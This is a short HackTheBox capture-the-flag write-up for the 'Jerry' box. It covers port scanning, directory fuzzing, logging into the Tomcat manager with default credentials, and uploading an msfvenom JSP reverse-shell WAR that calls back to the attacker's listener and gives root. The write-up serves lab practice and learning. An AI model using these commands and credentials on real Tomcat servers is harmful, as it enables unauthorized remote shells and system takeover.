HackTheBox Writeup – Jerry (Windows) – Easy Difficulty
Introduction
I wanted to do an easy box to warm up. In my opinion though, this box was TOO easy. I don’t like the boxes where you only need to exploit one thing. On the simpler boxes, this becomes too simple, and on the harder boxes, they tend to make everything as hard as possible. Either way, it’s no fun!
Enumeration / Initial Foothold
Let’s start with RustScan.
rustscan 10.10.10.95 --range 1-65535 -- -A -sC -sV | tee nmap.txt
That’s fine – we know it’s Apache Tomcat, as we can see it from browsing to the site.
Clicking on any of the links triggers HTTP Basic Auth, and nothing default that comes to mind works.
We can fuzz the directories of the site, using feroxbuster: feroxbuster -u http://10.10.10.95:8080/ --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --quiet -o ferox.txt
This will reveal a page for us – /manager/html.
A user named tomcat and a pssword of s3cret? Well, this is an easy box, after all.
Clicking on the Manager App from before and using these creds takes us to the Web Application Manager.
Fortunately, I have exploited one of these before. These use WAR files – it’s very easy to create a reverse shell with msfvenom in WAR format: msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f war -o revshell.war
We can spin up a listener on 4444, upload it:
Then navigate to /revshell – instant reverse shell.
It’s instant root… That’s a little disappointing! I was looking forward to some privilege escalation.
Lessons Learned
- Any credentials you find in error messages should be saved for later.
- The simplest solution should always be tried first.
Song Of The Day – Don’t Wanna Fall In Love by Jane Child